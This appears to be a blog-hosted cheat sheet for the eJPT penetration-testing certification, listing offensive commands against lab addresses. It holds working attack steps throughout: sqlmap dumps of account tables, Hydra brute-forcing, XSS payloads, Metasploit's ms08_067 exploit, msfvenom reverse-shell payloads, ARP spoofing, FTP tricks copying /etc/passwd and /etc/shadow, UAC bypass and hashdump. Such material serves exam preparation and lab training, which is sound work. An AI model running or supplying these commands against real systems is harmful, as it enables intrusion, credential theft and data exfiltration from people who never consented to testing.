eJPT
This is a Cheat-sheet for eJPT exam.
👶 Prerequisites
- Introduction
- Networking
- Web Applications
- Penetration Testing
Nmap
nmap -sn 10.10.10.0/24
nmap -sV -A 10.10.10.0
nmap -A -sV -n -v -Pn -p- -T4 —open -iL hosts.txt
fPing
fping -a -g 10.10.10.0/24 2>/dev/null
IP Route
Syntax ip route add <Network-range> via <router-IP> dev <interface>
eg. ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
John
unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt
john --show passwords.txt
dirb
dirb http://10.10.10.101:8080/
I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.
Netcat
Listening for reverse shell nc -nvlp 1234
SQLMap
sqlmap -u "http://10.10.10.7/Abc.php?id=2" --dbs
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz --tables
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts --columns
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts -C iban --dump
sqlmap -u "http://10.10.10.7/Abc.php?id=2" -D Xyz -T accounts --dump
sqlmap -r postrequest.txt
sqlmap -r post.txt --dump-all
Hydra
hydra -v -V -u -L userlist -P passwordslist -t 1 -u 10.10.10.14 ftp
hydra -v -V -u -L userlist -P passwordslist -t 1 -u 10.10.10.14 ssh
XSS
<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>
“><script>alert(1)</script>
This is a great filter bypass cheat-sheet: https://owasp.org/www-community/xss-filter-evasion-cheatsheet
Metasploit msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
...targets...
msf exploit(ms08_067_netapi) > set TARGET < target-id >
msf exploit(ms08_067_netapi) > show options
...show and set options...
msf exploit(ms08_067_netapi) > exploitmsfvenom shells
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Metasploit Meterpreter autoroute
run autoroute -s 10.10.10.0/24
ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i -t -r
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
SMB Enumeration
Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
enum4linux -a 10.10.10.212
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v
Access Share
smbclient //10.10.10.10/share_name
FTP Enumeration
nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v
Login to FTP server
ftp 10.10.10.10
SITE CPFR /etc/passwd
SITE CPTO /tmp/pass.txt
get /etc/passwd
SITE CPFR /etc/shadow
SITE CPTO /tmp/shadow.txt
get /etc/shadow
Meterpreter
- ps
- getuid
- getpid
- getsystem
- ps -U SYSTEM
CHECK UAC/Privileges
run post/windows/gather/win_privs
BYPASS UAC
Background the session first
exploit/windows/local/bypassuac
set session
After PrivEsc
migrate <pid>hashdump
Windows Command Line
To search for a file starting from current directory
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*filename*"
Check routing table
route print
netstat -r
Check Users
net users
List drives on the machine
wmic logicaldisk get Caption,Description,providername
Reference:
 |
| Image: eJPT |
0 Comments